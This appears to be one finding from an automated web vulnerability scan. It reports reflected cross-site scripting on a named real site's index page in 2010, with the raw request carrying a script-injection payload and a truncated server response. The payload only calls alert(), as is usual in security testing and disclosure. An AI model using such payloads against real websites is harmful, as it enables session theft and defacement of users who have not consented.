1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://mlb.mlb.com |
Path: | /index.jsp |
GET /index.jsp?c3b08"><script>alert(1)< Host: mlb.mlb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Content-Type: text/html; charset=utf-8 Cache-Control: max-age=600 Expires: Sat, 20 Nov 2010 18:06:26 GMT Date: Sat, 20 Nov 2010 17:56:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 131968 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http:/ ...[SNIP]... <meta property="og:url" content="http://mlb.mlb ...[SNIP]... |